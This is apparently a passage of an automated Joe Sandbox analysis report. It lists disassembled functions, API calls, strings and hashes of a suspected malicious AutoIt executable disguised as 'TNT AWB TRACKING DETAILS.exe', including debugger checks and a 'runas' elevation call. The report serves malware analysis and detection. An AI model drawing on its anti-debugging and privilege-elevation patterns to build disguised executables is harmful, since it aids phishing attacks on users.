                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                        • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,00000104,?), ref: 00401F4C
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                        • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                      • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                      • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                        • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                      • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                      • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                        • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                        • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                        • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                        • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                        • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                        • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                      • String ID: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                      • API String ID: 2495805114-4170455280
                                      • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                      • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                      • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                      • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                      Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1515 46cb5f-46cbc3 call 40bc70 * 3 call 408f40 1524 46cbd4-46cbe7 CLSIDFromProgID 1515->1524 1525 46cbc5-46cbcd OleInitialize 1515->1525 1526 46cc33-46cc47 1524->1526 1527 46cbe9-46cbf9 CLSIDFromString 1524->1527 1525->1524 1528 46cca6-46ccba call 458651 1526->1528 1529 46cc49-46cc60 CoCreateInstance 1526->1529 1527->1526 1530 46cbfb-46cc05 1527->1530 1532 46cc96-46cca1 1528->1532 1538 46ccbc-46ccf7 CoInitializeSecurity call 412f40 call 4311fc 1528->1538 1529->1532 1533 46cc62-46cc8b call 43119b 1529->1533 1534 46cc06-46cc30 call 451b42 call 402250 * 3 1530->1534 1532->1534 1550 46cc8e-46cc90 1533->1550 1552 46cdf4 1538->1552 1553 46ccfd-46cd1f call 402160 call 431a2b 1538->1553 1550->1532 1554 46ceb7-46cef0 call 468070 call 402250 * 3 1550->1554 1555 46cdfa-46ce4a call 412f40 CoCreateInstanceEx CoTaskMemFree 1552->1555 1568 46cd35-46cd41 call 465177 1553->1568 1569 46cd21-46cd33 1553->1569 1555->1532 1564 46ce50-46ce55 1555->1564 1564->1532 1567 46ce5b-46ce62 1564->1567 1571 46ce64-46ce8b CoSetProxyBlanket 1567->1571 1572 46ce8d-46ce9e 1567->1572 1580 46cd46-46cda3 call 40e0a0 call 402250 call 46150f call 40e0a0 call 402250 1568->1580 1573 46cda5-46cdaa 1569->1573 1571->1572 1572->1550 1577 46cea4-46ceb2 1572->1577 1578 46cdac-46cdbb call 4111c1 1573->1578 1579 46cdbd-46cdc0 1573->1579 1577->1534 1584 46cdc3-46cdf2 1578->1584 1579->1584 1580->1573 1584->1555
                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                      • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                                      • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                      • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                      • _wcslen.LIBCMT ref: 0046CDB0
                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                      • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                      • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                        • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                        • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                        • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                      Strings
                                      • NULL Pointer assignment, xrefs: 0046CEA6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 440038798-2785691316
                                      • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                      • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                      • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                      • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                      Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1986 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1995 40e582-40e583 1986->1995 1996 427674-427679 1986->1996 1999 40e585-40e596 1995->1999 2000 40e5ba-40e5cb call 40ef60 1995->2000 1997 427683-427686 1996->1997 1998 42767b-427681 1996->1998 2002 427693-427696 1997->2002 2003 427688-427691 1997->2003 2001 4276b4-4276be 1998->2001 2004 427625-427629 1999->2004 2005 40e59c-40e59f 1999->2005 2018 40e5ec-40e60c 2000->2018 2019 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2000->2019 2020 4276c6-4276ca GetSystemInfo 2001->2020 2002->2001 2009 427698-4276a8 2002->2009 2003->2001 2011 427636-427640 2004->2011 2012 42762b-427631 2004->2012 2007 40e5a5-40e5ae 2005->2007 2008 427654-427657 2005->2008 2014 40e5b4 2007->2014 2015 427645-42764f 2007->2015 2008->2000 2013 42765d-42766f 2008->2013 2016 4276b0 2009->2016 2017 4276aa-4276ae 2009->2017 2011->2000 2012->2000 2013->2000 2014->2000 2015->2000 2016->2001 2017->2001 2021 40e612-40e623 call 40efd0 2018->2021 2022 4276d5-4276df GetSystemInfo 2018->2022 2019->2018 2029 40e5e8 2019->2029 2020->2022 2021->2020 2028 40e629-40e63f call 40ef90 GetNativeSystemInfo 2021->2028 2032 40e641-40e642 FreeLibrary 2028->2032 2033 40e644-40e651 2028->2033 2029->2018 2032->2033 2034 40e653-40e654 FreeLibrary 2033->2034 2035 40e656-40e65d 2033->2035 2034->2035
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                      • FreeLibrary.KERNEL32(?), ref: 0040E642
                                      • FreeLibrary.KERNEL32(?), ref: 0040E654
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                      • String ID: 0SH
                                      • API String ID: 3363477735-851180471
                                      • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                      • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                      • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                      • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                      Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: IsThemeActive$uxtheme.dll
                                      • API String ID: 2574300362-3542929980
                                      • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                      • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                      • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                      • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                      Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                      • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                      • TranslateMessage.USER32(?), ref: 00409556
                                      • DispatchMessageW.USER32(?), ref: 00409561
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchSleepTranslate
                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                      • API String ID: 1762048999-758534266
                                      • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                      • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                      • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                      • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                      Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,00000104,?), ref: 00401F4C
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • __wcsicoll.LIBCMT ref: 00402007
                                      • __wcsicoll.LIBCMT ref: 0040201D
                                      • __wcsicoll.LIBCMT ref: 00402033
                                        • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                      • __wcsicoll.LIBCMT ref: 00402049
                                      • _wcscpy.LIBCMT ref: 0040207C
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,00000104), ref: 00428B5B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe$CMDLINE$CMDLINERAW
                                      • API String ID: 3948761352-1888923039
                                      • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                      • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                      • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                      • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                      Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock$_fseek_wcscpy
                                      • String ID: D)E$D)E$FILE
                                      • API String ID: 3888824918-361185794
                                      • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                      • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                      • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                      • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                      Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                      • __wsplitpath.LIBCMT ref: 0040E41C
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcsncat.LIBCMT ref: 0040E433
                                      • __wmakepath.LIBCMT ref: 0040E44F
                                        • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                      • _wcscpy.LIBCMT ref: 0040E487
                                        • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                      • _wcscat.LIBCMT ref: 00427541
                                      • _wcslen.LIBCMT ref: 00427551
                                      • _wcslen.LIBCMT ref: 00427562
                                      • _wcscat.LIBCMT ref: 0042757C
                                      • _wcsncpy.LIBCMT ref: 004275BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                      • String ID: Include$\
                                      • API String ID: 3173733714-3429789819
                                      • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                      • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                      • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                      • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                      Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • _fseek.LIBCMT ref: 0045292B
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                      • __fread_nolock.LIBCMT ref: 00452961
                                      • __fread_nolock.LIBCMT ref: 00452971
                                      • __fread_nolock.LIBCMT ref: 0045298A
                                      • __fread_nolock.LIBCMT ref: 004529A5
                                      • _fseek.LIBCMT ref: 004529BF
                                      • _malloc.LIBCMT ref: 004529CA
                                      • _malloc.LIBCMT ref: 004529D6
                                      • __fread_nolock.LIBCMT ref: 004529E7
                                      • _free.LIBCMT ref: 00452A17
                                      • _free.LIBCMT ref: 00452A20
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                      • String ID:
                                      • API String ID: 1255752989-0
                                      • Opcode ID: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                      • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                      • Opcode Fuzzy Hash: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                      • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                      Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                      • RegisterClassExW.USER32(00000030), ref: 004104ED
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                      • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                      • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                      • ImageList_ReplaceIcon.COMCTL32(00BE8EF8,000000FF,00000000), ref: 00410552
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
